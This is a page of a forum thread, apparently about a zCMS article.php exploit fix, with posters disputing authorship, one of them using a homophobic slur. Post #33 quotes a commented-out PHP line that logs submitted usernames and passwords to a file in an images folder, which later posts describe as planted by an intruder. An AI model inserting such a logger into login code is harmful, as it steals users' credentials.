zCMS article.php exploit fix!

Page 3 of 3 FirstFirst 123
Results 31 to 34 of 34
  1. #31
    sexiess is a sin. Subway is offline
    MemberRank
    Jun 2010 Join Date
    2,491Posts

    Re: zCMS article.php exploit fix!

    All threads warn you to the bottom if it's to old to bump, this1 didn't so

  2. #32
    "(still lacks brains)" NoBrain is offline
    MemberRank
    Sep 2011 Join Date
    United KingdomLocation
    2,658Posts

    Re: zCMS article.php exploit fix!

    Quote Originally Posted by Subway View Post
    Nice rip from Jessy @ 0taku.
    I did not rip it. -.-

    If you care to look at the dates, I released this on the 1st October - He or She released that on 7th October. Faggot.

  3. #33
    Gamma Spamma Liam is offline
    MemberRank
    Dec 2011 Join Date
    Down UnderLocation
    2,946Posts

    Re: zCMS article.php exploit fix?

    Quote Originally Posted by ησвяαιη View Post
    I fail at spotting sarcasm, sorry XD

    EDIT: Jonty, wtf were you thinking O.o

    PHP Code:
    // fwrite( fopen('./images/lol.txt', 'a+'), $_POST['credentials_username']." > ".mysql_real_escape_string($_POST['credentials_password'].chr(13))); exit; 
    This is not an exploit, and it wasn't coded by Jonteh, this is a code that logs passwords, and I think Meth0d coded it, or someone who release UberCMS, because it was intended to steal admin passwords, and the code can't be used, only if you remove the '//'
    Nice release, but I already patched this ;D

  4. #34
    Hello Der. Dynaxo is offline
    MemberRank
    Nov 2011 Join Date
    RaGEZONELocation
    297Posts

    Re: zCMS article.php exploit fix?

    Quote Originally Posted by MyKi View Post
    This is not an exploit, and it wasn't coded by Jonteh, this is a code that logs passwords, and I think Meth0d coded it, or someone who release UberCMS, because it was intended to steal admin passwords, and the code can't be used, only if you remove the '//'
    Nice release, but I already patched this ;D
    This has already been stated, look before you post:
    Quote Originally Posted by Jonteh View Post
    Zap got hacked around 7 months ago and that code was placed into our index to log our passwords, I commented it out and kept it there for future reference.



Page 3 of 3 FirstFirst 123

Advertisement